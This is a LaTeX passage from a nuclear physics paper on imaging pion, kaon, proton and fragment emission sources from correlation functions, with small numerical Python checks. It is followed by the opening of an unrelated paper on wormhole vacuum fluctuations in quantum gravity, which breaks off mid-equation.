\label{RKS}
\end{eqnarray}
From~(\ref{RKS}), it is apparent that to make
the imaging possible $\wfsquare{q}{r}$ must deviate from~1
either on account of symmetrization or interaction within
the pair. The angle-averaged version of (\ref{RKS}) is
\begin{equation}
{\cal R}_{P}({q}) = 4 \pi
\int dr \, r^2 \,
K_0 ({q},{r}) \,
S^0_P(r)
\label{RKS0}
\end{equation}
where $K_0$ is the angle-averaged kernel.
Let us first take the case of identical bosons with negligible
interaction, such as neutral pions or gammas. The two-particle
wavefunction is then
\begin{equation}
\wftn{q}{r}=\frac{1}{\sqrt{2}}\left( e^{i \vec{q}\cdot\vec{r}}
+e^{-i \vec{q}\cdot\vec{r}}\right) \, .
\end{equation}
The interference term causes $\wfsquare{q}{r}$ to deviate from 1 and
\begin{equation}
K(\vec{q},\vec{r}) = \cos{(2 \vec{q} \cdot \vec{r})}.
\end{equation}
In this case, the source is an inverse Fourier cosine-transform
of ${\cal R}_{P}$.
Also, the angle averaged source can be determined from a~Fourier
transformation (FT) of the angle-averaged~$C$ as the averaged
kernel is
\begin{equation}
K^0 (q,r) =
\frac{\sin{(2 q r)}}{2 q r} \, .
\end{equation}
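As a quick numerical cross-check (an illustrative sketch added here; the
momentum and radius values are arbitrary), one can verify that averaging the
full kernel $\cos(2\vec{q}\cdot\vec{r})$ over the relative orientation of
$\vec{q}$ and $\vec{r}$ reproduces the angle-averaged form above:

```python
import math

def k0_boson(q, r):
    # Angle-averaged Bose-Einstein kernel: K^0(q, r) = sin(2qr) / (2qr).
    x = 2.0 * q * r
    return math.sin(x) / x if x != 0.0 else 1.0

def k0_from_angle_average(q, r, n=20000):
    # Average the full kernel cos(2 q.r) over cos(theta) with a midpoint
    # rule: K^0 = (1/2) Integral_{-1}^{1} d(cos th) cos(2 q r cos th).
    h = 2.0 / n
    total = 0.0
    for i in range(n):
        c = -1.0 + (i + 0.5) * h       # cos(theta) on a midpoint grid
        total += math.cos(2.0 * q * r * c)
    return total * h / 2.0

q, r = 0.25, 3.0                       # arbitrary units with hbar = c = 1
closed_form = k0_boson(q, r)
averaged = k0_from_angle_average(q, r)
```

The two evaluations agree to the accuracy of the quadrature.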
While neutral pion and gamma correlation functions are difficult to measure,
charged pion correlation functions are not. The charged pion correlations
are often corrected approximately for the pion Coulomb interactions,
allowing for the use of FT in the pion source determination.
In Figure~\ref{corpi}, I show one such~corrected correlation function for
negative pions from the Au + Au reaction at 10.8~GeV/nucleon
from the measurements by E877 collaboration at
AGS~\cite{bar97}.
\begin{figure}
\begin{center}
\includegraphics[angle=-90.0,
width=0.68\textwidth]{corpi1.eps}
\end{center}
\caption{Gamow-corrected
$\pi^-\pi^-$ correlation function for Au + Au reaction at
10.8~GeV/nucleon obtained by the E877
collaboration~\protect\cite{bar97}.}
\label{corpi}
\end{figure}
In Figure~\ref{pisor}, I show the relative distribution of emission
points for negative pions obtained through the FT of the
correlation function in Fig.~\ref{corpi}.
\begin{figure}
\begin{center}
\includegraphics[angle=0.0,
width=0.66\textwidth]{piminus1.eps}
\end{center}
\caption{Relative source function for negative pions from FT
of the correlation function in Fig.~\protect\ref{corpi}.}
\label{pisor}
\end{figure}
The~FT has been cut off at $q_{max} = 200$~MeV/c, giving
a~resolution in the source of $\Delta r \gapproxeq 1/(2 \,
q_{max}) = 2.0$~fm. The~data spacing gives the highest
distances that can be studied with FT of $r_{max} \lapproxeq 1/(2
\, \Delta q) = 20$~fm. As you see, the~relative source has
a~roughly Gaussian shape.
\section{Perils of Inversion}
For many particle pairs, such as proton pairs, interactions
cannot be ignored and the straightforward FT cannot be used.
Indeed, even in the charged-pion case, one might want to avoid the
approximate Coulomb correction. In lieu of this, we can simply
discretize the source and find the source that minimizes the $\chi^2$.
This procedure could work for any particle pair.
With measurements of $C$ at relative momenta $\lbrace q_i
\rbrace$ and assuming the source is constant over intervals
$\lbrace \Delta r_j \rbrace$, we can write Eq.~(\ref{RKS0}) as
\begin{eqnarray}
{\cal R}_i =
\Clm{0}{0}{q_i}-1 & = & \sum_j 4\pi \, \Delta r_j
\,
r_j^2 \, K_0 (q_i, r_j) \, S(r_j)\\ &
\equiv & \sum_j K_{ij} \, S_j \, .
\end{eqnarray}
The values ${S_j}$ can be varied to minimize the $\chi^2$:
\begin{equation}
\chi^2 = \sum_j \frac{({\cal R}^{th}(q_j)-
{\cal R}^{exp}(q_j))^2}{\sigma_j^2 } \, .
\end{equation}
Derivatives of the $\chi^2$ with respect to the $S_k$ give linear algebraic
equations for~$S$:
\begin{equation}
\sum_{i} {1 \over \sigma_i^2} \Big( \sum_{j} K_{ij} \, S_j - {\cal
R}_i^{exp} \Big) K_{ik} = 0 \, ,
\end{equation}
with the solution in a schematic matrix form:
\begin{equation}
S = (K^\top K)^{-1} \, K^\top \, {\cal R}^{exp} \, .
\label{SKR}
\end{equation}
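The following minimal Python sketch illustrates this least-squares
inversion on synthetic input (the bin width, $q$ grid, and Gaussian radius
are invented for the illustration and do not correspond to the measured
data): the discretized kernel is built for the boson case, ${\cal R}$ is
generated from a known Gaussian source, and the source is recovered by
solving the normal equations.

```python
import math

def k0(q, r):
    # Angle-averaged boson kernel sin(2qr)/(2qr).
    x = 2.0 * q * r
    return math.sin(x) / x if x != 0.0 else 1.0

# Toy setup (illustrative numbers, not the measured data): fixed 2 fm bins.
dr = 2.0
r_bins = [dr * (j + 0.5) for j in range(7)]            # bin centres, fm
q_pts = [0.02 * (i + 1) for i in range(40)]            # momenta, fm^-1

R0 = 3.0                                               # "true" Gaussian radius
S_true = [math.exp(-(r / (2.0 * R0)) ** 2)
          / (2.0 * math.sqrt(math.pi) * R0) ** 3 for r in r_bins]

# Discretized relation R_i = sum_j K_ij S_j with K_ij = 4 pi dr r_j^2 K0.
K = [[4.0 * math.pi * dr * r * r * k0(q, r) for r in r_bins] for q in q_pts]
R = [sum(Ki[j] * S_true[j] for j in range(len(r_bins))) for Ki in K]

# Normal equations (K^T K) S = K^T R, solved by Gaussian elimination.
n = len(r_bins)
A = [[sum(K[i][a] * K[i][b] for i in range(len(q_pts))) for b in range(n)]
     for a in range(n)]
y = [sum(K[i][a] * R[i] for i in range(len(q_pts))) for a in range(n)]
for col in range(n):
    piv = max(range(col, n), key=lambda rr: abs(A[rr][col]))
    A[col], A[piv] = A[piv], A[col]
    y[col], y[piv] = y[piv], y[col]
    for row in range(col + 1, n):
        fct = A[row][col] / A[col][col]
        for c2 in range(col, n):
            A[row][c2] -= fct * A[col][c2]
        y[row] -= fct * y[col]
S_fit = [0.0] * n
for row in range(n - 1, -1, -1):
    S_fit[row] = (y[row] - sum(A[row][c2] * S_fit[c2]
                               for c2 in range(row + 1, n))) / A[row][row]
```

With noiseless synthetic input the fitted values reproduce the original
source to machine accuracy; the instabilities discussed next appear once
realistic errors and finer binnings enter.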
There is an issue in the above: how do we discretize the source?
The~FT used before suggests fixed-size bins, e.g.~$\Delta r = 2$~fm.
However, fixed-size bins may not be ideal for all situations, as I
will illustrate using Fig.~\ref{gong}. This figure shows the $pp$
correlation function from the measurements~\cite{gon91} of the
$^{14}$N + $^{27}$Al reaction at~75~MeV/nucleon, in different
intervals of total pair momentum.
\begin{figure}
\begin{center}
\includegraphics[angle=90.,width=3.0in]{fig3g.eps}
\end{center}
\caption{
Two-proton correlation function for the $^{14}$N + $^{27}$Al
reaction at~75~MeV/nucleon from the measurements of
Ref.~\protect\cite{gon91} for
three gates of total momentum imposed on protons emitted in the
vicinity of $\theta_{\rm lab} = 25^\circ$. }
\label{gong}
\end{figure}
The different regions in relative momentum are associated with
different physics of the correlation function. For example, the peak
around $q \sim 20$~MeV/c is associated with the $^{1}S_0$
resonance of the wavefunction with a characteristic scale of fm --
this gives access to a~short range structure of the source.
On the other hand, the decline in
the correlation function at low momenta is associated with the
Coulomb repulsion that dominates at large proton separation and
gives access to the source up to (20--30)~fm or more,
depending on how low momenta are available for~$C$. Should we
continue at the resolution of~$\Delta r \gapproxeq 2$~fm up to
such distances? No! At some point there would not be enough
data points to determine the required number of source values!
Somehow, we should let the resolution vary, depending on the scale
at which we look.
A further issue is that the errors on the source may explode in certain
cases. The errors are given by the inverse square of the kernel:
\begin{equation}
\Delta^2 S_j = (K^\top \, K)^{-1}_{jj} \, .
\end{equation}
The square of the kernel may be diagonalized:
\begin{equation}
(K^\top \, K)_{ij} \equiv \sum_k {1 \over \sigma_k^2} K_{ki}
\, K_{kj} = \sum_\alpha \lambda_\alpha \, u_i^\alpha \,
u_j^\alpha \, ,
\end{equation}
where $\lbrace u^\alpha \rbrace$ are orthonormal and
$\lambda_\alpha \ge 0$; the number of vectors equals the
number of $r$ points. The errors can be expressed as
\begin{equation}
\Delta^2 S_j = \sum_\alpha {1 \over \lambda_\alpha} \,
u_j^\alpha \, u_j^\alpha \, .
\end{equation}
You can see from the last equation that the errors blow up,
and the inversion problem becomes unstable,
if one or more of the $\lambda$'s approach zero. This
must happen when $K$ maps a~region to zero (remember $K =
|\Phi|^2 - 1$), or when $K$ is too smooth and/or too high
a~resolution is demanded. A~$\lambda$ close to 0 may also be
hit by accident.
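A two-bin toy model (with invented eigenvalues and eigenvectors) makes the
blow-up explicit:

```python
import math

def source_variances(lam1, lam2):
    # Delta^2 S_j = sum_alpha u_j^alpha u_j^alpha / lambda_alpha for a 2x2
    # K^T K with orthonormal eigenvectors u^1=(1,1)/sqrt2, u^2=(1,-1)/sqrt2.
    u1 = (1.0 / math.sqrt(2.0), 1.0 / math.sqrt(2.0))
    u2 = (1.0 / math.sqrt(2.0), -1.0 / math.sqrt(2.0))
    return [u1[j] ** 2 / lam1 + u2[j] ** 2 / lam2 for j in range(2)]

stable = source_variances(1.0, 0.5)     # both eigenvalues O(1): finite errors
unstable = source_variances(1.0, 1e-8)  # one eigenvalue near zero: errors explode
```

A single eigenvalue of $10^{-8}$ inflates every $\Delta^2 S_j$ by roughly
eight orders of magnitude, which is exactly the pathology seen in
Fig.~\ref{nocon2}.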
The~stability issue is illustrated with Figs.~\ref{simcor}
and~\ref{nocon2}. Figure~\ref{simcor} shows correlation
functions from model sources with small errors added on.
\begin{figure}
\begin{center}
\includegraphics[angle=0.,width=0.72\textwidth]{cormod.eps}
\end{center}
\caption{
The solid line represents the correlation function from a Gaussian
model source while the dashed lines represent the
correlation functions from a source with an extended tail.
The~points represent values of~$C$ with errors that are
typical for the measurements in Ref.~\protect\cite{gon91}
(Fig.~\protect\ref{gong}). }
\label{simcor}
\end{figure}
\begin{figure}
\begin{center}
\includegraphics[angle=0.,
width=0.72\textwidth]{sorc.eps}
\end{center}
\caption{
The solid histogram is the relative $pp$ source function $S$
restored from the simulated correlation function in
Fig.~\protect\ref{simcor} from the Gaussian model source
(open symbols there).
The~dashed line is the original source function that we used to
generate the correlation function. We employed
fixed-size intervals of $\Delta r = 2$~fm and we imposed
no constraints on~$S$.
}
\label{nocon2}
\end{figure}
Figure~\ref{nocon2} shows the source in 7~fixed-size intervals
of $\Delta r = 2$~fm. This source was restored following
Eq.~(\ref{SKR}), from the correlation function indicated in
Fig.~\ref{simcor}. The~errors in this case far exceed
the original source function. Every second value of
the restored source is negative.
A~vast literature, extending back nearly 75 years, exists on
stability in inversion. One of the first researchers to recognize
the difficulty, Hadamard, in 1923~\cite{had23}, argued that
potentially unstable problems should not be tackled. A~major
step forward was made by Tikhonov~\cite{tik63} who has shown
that placing constraints on the solution can have a~dramatic
stabilizing effect. In determining the source from data, we
developed a~method of optimized discretization for the source
which yields stable results even without any constraints~\cite{bro97}.
In our method, we first concentrate on the errors. We
use the $q$-values for which the correlation function is
determined and the errors $\lbrace \sigma_i \rbrace$,
but we disregard the values~$\lbrace C_i \rbrace$. We
optimize the binning for the source function to minimize
expected errors relative to a~rough guess on the source
$S^{mod}$:
\begin{equation}
\sum_j {\Delta S_j \over S_j^{mod}} = \sum_{j} {1 \over
S_j^{mod}} \left( \sum_\alpha
{1 \over \lambda_\alpha} \,
u_j^\alpha \, u_j^\alpha \right)^{1/2} \, .
\end{equation}
Only afterwards do we use $\lbrace C_i \rbrace$ to determine
source values $S_j$ with the optimized binning. This
consistently yields small errors and an introduction of
constraints may additionally reduce those errors.
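A schematic version of the idea (a deliberately simplified stand-in for the
actual procedure of Ref.~\cite{bro97}; the $q$ grid, error size, model
source, and candidate binnings below are all invented): among candidate
binnings, keep the one minimizing the expected-error figure of merit, which
involves only the $q$ grid and the errors, never the measured values $C_i$.

```python
import math

def k0(q, r):
    x = 2.0 * q * r
    return math.sin(x) / x if x != 0.0 else 1.0

def invert(M):
    # Gauss-Jordan inversion with partial pivoting (fine for tiny matrices).
    n = len(M)
    A = [row[:] + [1.0 if i == j else 0.0 for j in range(n)]
         for i, row in enumerate(M)]
    for col in range(n):
        piv = max(range(col, n), key=lambda rr: abs(A[rr][col]))
        A[col], A[piv] = A[piv], A[col]
        p = A[col][col]
        A[col] = [v / p for v in A[col]]
        for row in range(n):
            if row != col:
                f = A[row][col]
                A[row] = [v - f * w for v, w in zip(A[row], A[col])]
    return [row[n:] for row in A]

def expected_error_sum(edges, q_pts, sigma, s_model):
    # Figure of merit sum_j Delta S_j / S_j^mod; uses only the q grid, the
    # assumed errors sigma, and a rough model source -- never the data C_i.
    centres = [(a + b) / 2.0 for a, b in zip(edges, edges[1:])]
    widths = [b - a for a, b in zip(edges, edges[1:])]
    K = [[4.0 * math.pi * w * r * r * k0(q, r)
          for r, w in zip(centres, widths)] for q in q_pts]
    ktk = [[sum(K[i][a] * K[i][b] for i in range(len(q_pts))) / sigma ** 2
            for b in range(len(centres))] for a in range(len(centres))]
    cov = invert(ktk)
    return sum(math.sqrt(cov[j][j]) / s_model(r)
               for j, r in enumerate(centres))

q_pts = [0.05 * (i + 1) for i in range(12)]        # toy momentum grid, fm^-1
model = lambda r: math.exp(-(r / 6.0) ** 2)        # rough guess of the source
candidates = [[0.0, 4.0, 8.0, 12.0],               # uniform binning
              [0.0, 2.0, 5.0, 12.0],               # finer at small r
              [0.0, 1.5, 4.0, 12.0]]
scores = [expected_error_sum(e, q_pts, 0.01, model) for e in candidates]
best = candidates[scores.index(min(scores))]
```

By construction the selected binning is never worse than the uniform one,
mirroring how the optimized discretization lets the resolution vary with
scale.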
The~proton source imaged using the optimized binning from the
correlation function in Fig.~\ref{simcor} is shown
in~Fig.~\ref{nocono}.
\begin{figure}
\begin{center}
\includegraphics[angle=0.,
width=0.72\textwidth]{sorm1.eps}
\end{center}
\caption{
Relative pp source function~$S$ restored (solid histogram)
through the optimized discretization from the correlation
function in Fig.~\protect\ref{simcor} (open symbols there),
together with the original source
function (dashed
line).
}
\label{nocono}
\end{figure}
\section{pp Sources}
Having tested the method, we apply it to the~75~MeV/nucleon
$^{14}$N + $^{27}$Al data by Gong {\em et al.}~\cite{gon91} shown in
Fig.~\ref{gong}. In terms of the radial wavefunctions $g$, the
angle-averaged $pp$ kernel is
\begin{equation}
K_0 (q,r)=\frac{1}{2}\sum_{j s \ell \ell'} (2j+1) (g_{j
s}^{\ell \ell'} (r))^2-1 \, .
\end{equation}
We calculate the wavefunctions by solving radial Schr\"odinger
equations with REID93~\cite{sto94} and Coulomb potentials.
The~sources restored in the three total momentum intervals are
shown in Fig.~\ref{pps}, together with sources obtained
directly from a~Boltzmann equation model~\cite{dan95} (BEM)
for heavy-ion reactions.
\begin{figure}
\begin{center}
\includegraphics[width=4.55in]{sorpp.eps}
\end{center}
\caption{
Relative source
for protons emitted from the $^{14}$N + $^{27}$Al
reaction at 75~MeV/nucleon, in the vicinity of $\theta_{\rm
lab} = 25^\circ$, within three intervals of total momentum
of 270--390~MeV/c (left panel), 450--780~MeV/c
(center panel), and 840--1230~MeV/c (right panel). Solid and
dotted lines
indicate, respectively, the source values extracted from
data~\protect\cite{gon91} and obtained within the
Boltzmann-equation calculation.
}
\label{pps}
\end{figure}
The sources become more focused around $r=0$ as total momentum
increases. Now, the~value of the source as $r \rightarrow 0$ gives
information on the average density at freeze-out, on space-averaged
phase-space density, and on the
entropy per nucleon. The~freeze-out density may be
estimated from
\begin{equation}
\rho_{freeze} \simeq N_{\rm part} \times
\Sourcenovec{}{r\rightarrow 0} \, ,
\end{equation}
where $N_{\rm part}$ is participant multiplicity. Using the
intermediate momentum range, we find
\begin{equation}
\rho_{freeze}
\approx
(17)(0.0015~{\rm fm}^{-3}) = 0.16 \, \rho_0 \, .
\end{equation}
The space-averaged phase-space density may be estimated from
\begin{equation}
f(\vec{p})\approx\frac{(2\pi)^3}{2s+1}\spectra{P}
\Sourcenovec{\vec{P}}{{r}\rightarrow 0} \, .
\end{equation}
Using the intermediate momentum range we
get $\langle f \rangle \approx 0.23$ for this reaction.
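The arithmetic behind the density estimate can be checked directly
(assuming, as is standard, the saturation density $\rho_0 =
0.16~{\rm fm}^{-3}$; the multiplicity and $S(r\rightarrow 0)$ values are
those quoted above):

```python
# Back-of-the-envelope check of the freeze-out density quoted in the text,
# assuming the standard saturation density rho_0 = 0.16 fm^-3.
n_part = 17                 # participant multiplicity (value from the text)
s_at_zero = 0.0015          # S(r -> 0) in fm^-3, intermediate-momentum gate
rho_0 = 0.16                # fm^-3
rho_freeze = n_part * s_at_zero     # about 0.0255 fm^-3
ratio = rho_freeze / rho_0          # about 0.16 rho_0
```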
The transport model reproduces the low-$r$ features of the
sources, including the increased focusing as the total momentum
increases. The~average freeze-out density obtained directly
within the model is $\rho_{freeze} \simeq .14 \rho_0$. Despite
the agreement at low~$r$ between the data and the model, we see
important discrepancies at large~$r$. I discuss these next.
An important quantity characterizing images is the portion
of the source below a~certain distance (e.g.\ the maximum
$r$ imaged):
\begin{equation}
\lambda(r_{max})=\int_{r<r_{max}} d^3 r \, S(\vec{r}) \, .
\label{lambda}
\end{equation}
If $r_{max}\rightarrow \infty$, then $\lambda$ approaches
unity. A value of $\lambda < 1$ signals that some of the
strength of~$S$ lies outside of the imaged region. The imaged
region is limited in practice by the available information on
details of~$C$ at very-low~$q$.
We can expect pronounced effects for secondary
decays or for long source lifetimes. If some particles
stem from decays of long-lived resonances,
they may be emitted far from any other
particles and contribute to $S$ at $r > r_{max}$.
Table~\ref{lpp} gives the integrals of the imaged sources
together with the integrals of the sources from BEM over the
same spatial region.
\begin{table}
\begin{center}
\begin{tabular}{|cr@{$\pm$}lcc|}\hline
\multicolumn{1}{|c}{$P$-Range} &
\multicolumn{3}{c}{$\lambda(r_{max})$} &
\multicolumn{1}{c|}{$r_{max}$} \\ \cline{2-4}
\multicolumn{1}{|c}{[MeV/c]} &
\multicolumn{2}{c}{restored} &
\multicolumn{1}{c}{BEM} &
\multicolumn{1}{c|}{[fm]} \\ \hline
270-390 & 0.69 & 0.15 & 0.98 & 20.0 \\
450-780 & 0.574 & 0.053 & 0.91 & 18.8 \\
840-1230 & 0.87 & 0.14 & 0.88 & 20.8 \\\hline
\end{tabular}
\end{center}
\caption{Integrals of sources from data and BEM in the three
intervals of total momentum.}
\label{lpp}
\end{table}
Significant strength is missing from the imaged sources in the
low and intermediate momentum intervals. BEM agrees with data
in the highest momentum interval but not in the two
lower-momentum intervals. In BEM there is no intermediate mass
fragment (IMF) production. The~IMFs might be produced in
excited states and, by decaying, contribute protons with low
momenta spread out over large spatial distances. Information
on this possibility can be obtained by examining the IMF
correlation functions.
\section{IMF Sources}
Because of the large charges ($Z \ge 3$), the~kernel in the case
of IMFs is dominated by Coulomb repulsion. With many
partial waves contributing, the kernel approaches the classical
limit~\cite{kim91}:
\begin{equation}
K_0 (q,r)=\theta(r-r_c) (1-r_c/r)^{1/2}-1 \, ,
\end{equation}
where
$r_c=2\mu Z_1 Z_2 e^2/q^2$ is the distance of closest
approach. There are no IMF correlation data available for the
same reaction used to measure the pp correlation data, so we use
data within the same beam energy range, i.e.\ the
$^{84}$Kr + $^{197}$Au data at 35, 55, and 70 MeV/nucleon
of Hamilton {\em et al.}~\cite{ham96}.
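A small helper implementing this classical kernel (units: $q$ in MeV/c,
reduced mass $\mu$ in MeV/c$^2$, $e^2 \approx 1.44$~MeV\,fm; the example
masses and charges are illustrative, not taken from the data):

```python
import math

E2 = 1.44          # e^2 = alpha * hbar c, in MeV fm (approximate)

def closest_approach(q, mu, z1, z2):
    # r_c = 2 mu Z1 Z2 e^2 / q^2, in fm, for q in MeV/c and mu in MeV/c^2.
    return 2.0 * mu * z1 * z2 * E2 / q ** 2

def k0_classical(q, r, mu, z1, z2):
    # Classical Coulomb kernel: theta(r - r_c) sqrt(1 - r_c/r) - 1.
    rc = closest_approach(q, mu, z1, z2)
    if r <= rc:
        return -1.0
    return math.sqrt(1.0 - rc / r) - 1.0

# Example: two Z = 3 fragments with reduced mass ~3000 MeV/c^2 at q = 50 MeV/c.
rc = closest_approach(50.0, 3000.0, 3, 3)      # roughly 31 fm
```

The kernel is $-1$ inside the classically forbidden region $r < r_c$ and
relaxes slowly to zero at large separations, which is why the IMF
correlations probe the source out to tens of fm.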
The extracted relative IMF sources are shown in Fig.~\ref{IMF}.
\begin{figure}
\begin{center}
\includegraphics[totalheight=3.3in]{fig9.eps}
\end{center}
\caption{
Relative source for IMFs emitted from
central
$^{84}$Kr + $^{197}$Au reactions from the data of
Ref.~\protect\cite{ham96} at 35 (dotted line), 55~(dashed line), and
70~MeV/nucleon (solid line). The insert shows the source
multiplied by~$r^2$. In both plots, the full image extends out to $90$~fm.
}
\label{IMF}
\end{figure}
The source integrals for the IMF sources are given in
Table~\ref{IMFt}. Interestingly, we are nearly capable of restoring
the complete IMF sources.
\begin{table}
\begin{center}
\begin{tabular}{|cr@{$\pm$}lr@{$\pm$}l|}\hline
\multicolumn{1}{|c}{Beam Energy} &
\multicolumn{2}{c}{$\lambda(90 \,{\rm fm})$} &
\multicolumn{2}{c|}{$\lambda(20 \, {\rm fm})$} \\
\multicolumn{1}{|c}{[MeV/A]} &
\multicolumn{2}{c}{ } &
\multicolumn{2}{c|}{ } \\ \hline
35 & 0.96 & 0.07 & 0.72 & 0.04 \\
55 & 0.97 & 0.06 & 0.78 & 0.03 \\
70 & 0.99 & 0.05 & 0.79 & 0.03 \\\hline
\end{tabular}
\end{center}
\caption{Comparison of the integrals of the midrapidity IMF
source function,
$\lambda(r_{max})$,
in central $^{84}$Kr
+ $^{197}$Au reactions at three beam energies,
for different truncation points, $r_{max}$.
The restored sources use the data of Ref.~\protect\cite{ham96}.}
\label{IMFt}
\end{table}
For the relative distances that are accessible using the pp
correlations ($\sim 20$~fm) we find only (70--80)\% of the IMF
sources. This is comparable to what we see for the lowest-momentum
pp source but above the intermediate-momentum proton source.
We should mention that we cannot expect complete quantitative
agreement, even if the data were from the
same reaction and pertained to the same particle-velocity
range. This is due partly to the fact that more protons than final
IMFs can stem from secondary decays.
\section{$\pi^-$ vs. $K^+$ Sources}
We end our discussion of imaging by presenting sources obtained
for pions and kaons from central Au + Au reactions at about
11~GeV/nucleon. This time we use the optimized discretization
technique rather than
the combination of approximate Coulomb corrections and the FT.
For both meson pairs the kernel $K_0$ is given by
a~sum over partial waves:
\begin{equation}
K_0 (q,r)=\sum_{\ell} \frac{(g^{\ell}(r))^2}{(2\ell+1)} -1 \, ,
\end{equation}
where the $g^{\ell}(r)$ stem from solving the radial Klein-Gordon
equation with strong and Coulomb interactions. In practice the
strong interactions had barely any effect on the kernels and the extracted
sources.
The data come from the reactions at 10.8~GeV/nucleon~\cite{bar97} and
11.4~GeV/nucleon~\cite{von98}.
The respective $\pi^-$ and $K^+$ sources are displayed in Fig.~\ref{pikso}.
\begin{figure}
\begin{center}
\includegraphics[totalheight=2.70in]{piksou1.eps}
\end{center}
\caption{
Relative sources of~$\pi^-$ (circles) and of $K^+$ (triangles)
extracted
from central Au + Au data at
11.4~GeV/nucleon~\protect\cite{von98}, for $\pi^-$ and $K^+$,
and at 10.8~GeV/nucleon~\protect\cite{bar97}, for $\pi^-$.
Lines show Gaussian fits to the sources.
}
\label{pikso}
\end{figure}
The kaon source is far more compact than the pion source and
there are several effects that contribute to this difference.
First, kaons have lower scattering cross sections than pions,
making it easier for kaons to leave the system early. Second,
fewer kaons than pions descend from long-lived resonances.
Next, due to their higher mass, the average kaon has a lower
speed than the average pion, making
the kaons less sensitive to lifetime effects. Finally, the kaons
are more sensitive to collective motion than pions, enhancing the kaons'
space-momentum correlations.
Differences in the spatial distributions of emission points for kaons
and pions, qualitatively similar to those seen in Fig.~\ref{pikso},
were predicted long ago within RQMD by
Sullivan~{\em et al.}~\cite{sul93}. In the model, they were able to
separate
the different contributions to the source functions.
The~effects of long-lived resonances, mentioned above, are
apparent in the sources extracted from the data.
Thus,
Table~\ref{lampik} gives
\begin{table}
\begin{center}
\begin{tabular}{|cccr@{$\pm$}l|}
\hline
\multicolumn{1}{|c}{} &
\multicolumn{2}{c}{} &
\multicolumn{2}{c|}{} \\[-2.1ex]
\multicolumn{1}{|c}{} &
\multicolumn{1}{c}{$R_0$ [fm]} &
\multicolumn{1}{c}{$\bar{\lambda}$} &
\multicolumn{2}{c|}{$\lambda(35 {\rm fm})$} \\ \hline
$K^+$ (11.4 GeV/A) & 2.76 & 0.702 & 0.86 & 0.56 \\
$\pi^-$ (11.4 GeV/A) & 6.42 & 0.384 & 0.44 & 0.17 \\
$\pi^-$ (10.8 GeV/A) & 6.43 & 0.486 & 0.59 & 0.22 \\ \hline
\end{tabular}
\end{center}
\caption{
Parameters of Gaussian fits to the sources and integrals
over imaged regions for the central Au + Au reactions.
}
\label{lampik}
\end{table}
the source integrals over the imaged regions together with
parameters of the Gaussian fits to the sources,
\begin{equation}
S(r) = \frac{\bar{\lambda}}{(2\sqrt{\pi} R_0)^3} \exp{\left(-\left(
\frac{r}{2 R_0}\right)^2\right)} \, .
\end{equation}
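For this Gaussian parametrization, $\lambda(r_{max})$ has a closed form,
which makes it easy to check that the fitted Gaussians are essentially
contained within the imaged region (a sketch using the 11.4~GeV/nucleon
$\pi^-$ fit parameters from Table~\ref{lampik}):

```python
import math

def lam_gauss(r_max, lam_bar, r0):
    # lambda(r_max) = Int_0^{r_max} 4 pi r^2 S(r) dr for the Gaussian fit
    # S(r) = lam_bar / (2 sqrt(pi) R0)^3 exp(-(r / 2 R0)^2), in closed form.
    u = r_max / (2.0 * r0)
    return lam_bar * (math.erf(u)
                      - 2.0 / math.sqrt(math.pi) * u * math.exp(-u * u))

# pi^- fit at 11.4 GeV/nucleon: R0 = 6.42 fm, lam_bar = 0.384 (table values).
frac_inside = lam_gauss(35.0, 1.0, 6.42)   # unit-strength Gaussian inside 35 fm
pi_lam_35 = lam_gauss(35.0, 0.384, 6.42)
```

Integrating the fit out to 35~fm returns nearly all of $\bar{\lambda}$,
consistent with $\bar{\lambda} \lapproxeq \lambda$ found above.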
The~errors are quite small for the fitted values. We find
$\bar{\lambda}_{\pi^-} < \bar{\lambda}_{K^+} < 1$
and~$\bar{\lambda} \lapproxeq \lambda$.
\section{Conclusions}
We have demonstrated that a~model-independent imaging of
reactions is possible. Specifically, we have carried out
one-dimensional
imaging of pion, kaon, proton, and IMF sources.
The~three-dimensional imaging of pion sources is in
progress. Our method of optimized discretization allows us to
investigate the sources on a~logarithmic scale up to
large distances. The sources generally contain information
on freeze-out phase-space density, entropy, spatial density,
lifetime and size of the freeze-out region, as well as
on resonance decays. The imaging gives us access to the spatial
structure required to extract that information.
\section*{Acknowledgment}
This work was partially supported by the National Science Foundation
under Grant PHY-9605207.
\section*{References}
proofpile-arXiv_065-8154 | \section{Introduction}
One of the most fascinating problems of our century is the possibility of
combining the principles of Quantum Mechanics with those of General
Relativity. The result of this combination is best known as Quantum Gravity.
However, such a theory has yet to be developed, principally due to the UV
divergences that cannot be kept under control by any renormalization scheme.
J.A. Wheeler\cite{Wheeler} was the first to conjecture that fluctuations
of the metric appear at short distance scales. The collection of
such fluctuations gives the spacetime a kind of foam-like structure, whose
topology is constantly changing. In this foamy spacetime a fundamental
length comes into play: the Planck length. Its inverse, the Planck mass $m_p$%
, can be thought of as a natural cut-off. It is believed that in such a
spacetime, general relativity can be renormalized when a density of virtual
black holes is taken into consideration, coupled to $N$ fermion fields in a $%
1/N$ expansion\cite{CraneSmolin}. It is also argued that when gravity is
coupled to $N$ conformally invariant scalar fields the evidence that the
ground-state expectation value of the metric is flat space is false\cite
{HartleHorowitz}. However instead of looking at gravity coupled to matter
fields, we will consider pure gravity. In this context, two spherically
symmetric metrics are known which solve the equations of motion
without a cosmological constant: the Schwarzschild metric
and the Flat metric. We will focus our attention on these two metrics with
the purpose of examining the energy contribution to the vacuum fluctuation
generated by a collection of $N$ coherent wormholes. A straightforward
extension to the deSitter and the Schwarzschild-deSitter spacetime case is
immediate. The paper is structured as follows, in section \ref{p2} we
briefly recall the results reported in Ref.\cite{Remo1}, in section \ref{p3}
we generalize the result of section \ref{p2} to $N_w$ wormholes. We
summarize and conclude in section \ref{p3}.
\section{One wormhole approximation}
\label{p2}The reference model we will consider is an eternal black hole. The
complete manifold ${\cal M}$ can be thought as composed of two wedges ${\cal %
M}_{+}$ and ${\cal M}_{-}$ located in the right and left sectors of a
Kruskal diagram whose spatial slices $\Sigma $ represent Einstein-Rosen
bridges with wormhole topology $S^2\times R^1$. The hypersurface $\Sigma $
is divided in two parts $\Sigma _{+}$ and $\Sigma _{-}$ by a bifurcation
two-surface $S_0$. We begin with the line element
\begin{equation}
ds^2=-N^2\left( r\right) dt^2+\frac{dr^2}{1-\frac{2m}r}+r^2\left( d\theta
^2+\sin ^2\theta d\phi ^2\right) \label{a1}
\end{equation}
and we consider the physical Hamiltonian defined on $\Sigma $%
\[
H_P=H-H_0=\frac 1{l_p^2}\int_\Sigma d^3x\left( N{\cal H}+N_i{\cal H}%
^i\right) +H_{\partial \Sigma ^{+}}+H_{\partial \Sigma ^{-}}
\]
\[
